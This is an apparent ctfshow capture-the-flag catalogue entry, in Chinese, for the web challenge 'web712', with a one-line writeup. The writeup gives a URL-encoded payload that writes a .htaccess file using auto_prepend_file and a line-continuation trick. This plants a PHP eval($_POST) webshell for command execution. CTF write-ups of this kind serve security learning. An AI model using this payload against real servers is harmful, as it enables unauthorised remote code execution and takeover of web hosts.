web712
| ID: | 4382 |
|---|---|
| 标题: | web712 |
| 描述: | > 某赛某题 **此系列题目均收集自互联网,且进行了深度二开,直接搜答案提交是不行的** 侵删 |
| 类型: | WEB入门.大赛原题 |
| 网站: | ctfshow |
| 题目链接: | https://ctf.show/api/v1/challenges/1620 |
| 赛事: | 大赛原题 |
| 年度: | None |
| Flag值: | 题目答案文本 |
| writeup: |
验证后的网址 通过构造.htaccess文件上传恶意代码实现命令执行,payload为?filename=.htaccess&content=php_value%20auto_prepend_fil%5C%0Ae%20%22.htaccess%22%0A%23%3C%3Fphp%20eval(%24_POST%5B1%5D)%3B%3F%3E%5C,访问/index.php后使用POST传参执行命令 1 https://blog.csdn.net/miuzzx/article/details/123070848 |